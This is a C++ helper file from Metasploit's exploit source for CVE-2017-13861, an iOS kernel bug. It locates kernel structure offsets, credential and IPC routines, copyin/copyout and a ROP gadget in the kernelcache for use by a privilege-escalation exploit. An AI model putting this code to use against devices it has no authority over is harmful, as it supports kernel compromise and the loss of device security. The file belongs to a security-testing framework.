GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2017-13861/liboffsetfinder64/getoffsets.cpp
#include <errno.h>
#include <string.h> // strcmp, strerror
#include <sys/utsname.h> // uname
#include "liboffsetfinder64.hpp"
#include "getoffsets.h"
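// Offset table handed out by get_offsets(). Being a static it is zero-filled
// until get_offsets() populates it from the kernelcache; a zero `base` is
// therefore the tell-tale of an unpopulated table.
static offsets_t off;
// Legacy "initialised" flag: get_offsets() sets it once the finder has been
// created. It does NOT by itself guarantee that `off` has been populated.
static bool didInit = false;
// Lazily created parser over the on-device kernelcache, shared by
// get_offsets() and find_symbol(). Nothing in this file ever deletes it; it
// lives for the remainder of the process.
static tihmstar::offsetfinder64* finder = nullptr;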
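/// Returns the table of kernel offsets for the running device.
///
/// The first call creates the shared kernelcache parser (if find_symbol()
/// has not already done so) and fills every field of the file-static `off`
/// from it; later calls return the cached table unchanged.
///
/// @return Pointer to the file-static, process-lifetime offsets_t. Never
///         null; the caller must not free it.
///
/// NOTE(review): if the offsetfinder64 constructor or one of the find_*()
/// calls throws, nothing is marked as ready and the exception propagates to
/// the caller, so the next call retries from the same point. The function
/// is not thread-safe: the first call must complete before any concurrent
/// call is made.
offsets_t* get_offsets()
{
    // Whether `off` has been populated. This is tracked separately from the
    // file-level `didInit`, because that flag is also set by a plain symbol
    // lookup (find_symbol) that never fills the table; gating population on
    // it handed a zero-filled table to callers that looked up a symbol first.
    static bool offsets_ready = false;

    if (!finder) {
        finder = new tihmstar::offsetfinder64("/System/Library/Caches/com.apple.kernelcaches/kernelcache");
    }
    didInit = true; // the finder exists; keeps the legacy flag consistent

    if (!offsets_ready) {
        // Hard-coded rather than discovered from the kernelcache: these two
        // values will not adapt to a different kernel build, unlike the
        // finder-derived fields below.
        off.base = 0xfffffff007004000;
        off.realhost_special = 0x10;

        // Structure field offsets.
        off.sizeof_task = (kptr_t)finder->find_sizeof_task();
        off.task_itk_self = (kptr_t)finder->find_task_itk_self();
        off.task_itk_registered = (kptr_t)finder->find_task_itk_registered();
        off.task_bsd_info = (kptr_t)finder->find_task_bsd_info();
        off.proc_ucred = (kptr_t)finder->find_proc_ucred();
        off.vm_map_hdr = (kptr_t)finder->find_vm_map_hdr();
        off.ipc_space_is_task = (kptr_t)finder->find_ipc_space_is_task();
        off.iouserclient_ipc = (kptr_t)finder->find_iouserclient_ipc();
        off.vtab_get_retain_count = (kptr_t)finder->find_vtab_get_retain_count();
        off.vtab_get_external_trap_for_index = (kptr_t)finder->find_vtab_get_external_trap_for_index();

        // Kernel globals and functions.
        off.zone_map = (kptr_t)finder->find_zone_map();
        off.kernel_map = (kptr_t)finder->find_kernel_map();
        off.kernel_task = (kptr_t)finder->find_kernel_task();
        off.realhost = (kptr_t)finder->find_realhost();
        off.copyin = (kptr_t)finder->find_copyin();
        off.copyout = (kptr_t)finder->find_copyout();
        off.chgproccnt = (kptr_t)finder->find_chgproccnt();
        off.kauth_cred_ref = (kptr_t)finder->find_kauth_cred_ref();
        off.ipc_port_alloc_special = (kptr_t)finder->find_ipc_port_alloc_special();
        off.ipc_kobject_set = (kptr_t)finder->find_ipc_kobject_set();
        off.ipc_port_make_send = (kptr_t)finder->find_ipc_port_make_send();
        off.osserializer_serialize = (kptr_t)finder->find_osserializer_serialize();
        off.rop_ldr_x0_x0_0x10 = (kptr_t)finder->find_rop_ldr_x0_x0_0x10();

        // Only mark ready after every lookup succeeded, so a throwing find_*()
        // leaves the table to be rebuilt on the next call.
        offsets_ready = true;
    }
    return &off;
}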
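/// Resolves a kernel symbol name to its address in the on-device kernelcache.
///
/// Creates the shared finder on first use (the same instance get_offsets()
/// uses) and delegates the lookup to offsetfinder64::find_sym.
///
/// @param symbol NUL-terminated symbol name, passed straight through to the
///               finder; a null pointer is not checked here.
/// @return The symbol's address as kptr_t. What find_sym yields for an
///         unknown symbol (0 or an exception) is decided by the library —
///         TODO confirm against liboffsetfinder64 before relying on it.
///
/// Deliberately leaves the file-level `didInit` flag alone: get_offsets()
/// owns that flag and used it to decide whether the offsets table still has
/// to be filled, so setting it from a plain symbol lookup let a later
/// get_offsets() hand back an unpopulated table.
kptr_t find_symbol(const char* symbol) {
    if (!finder) {
        finder = new tihmstar::offsetfinder64("/System/Library/Caches/com.apple.kernelcaches/kernelcache");
    }
    return (kptr_t)finder->find_sym(symbol);
}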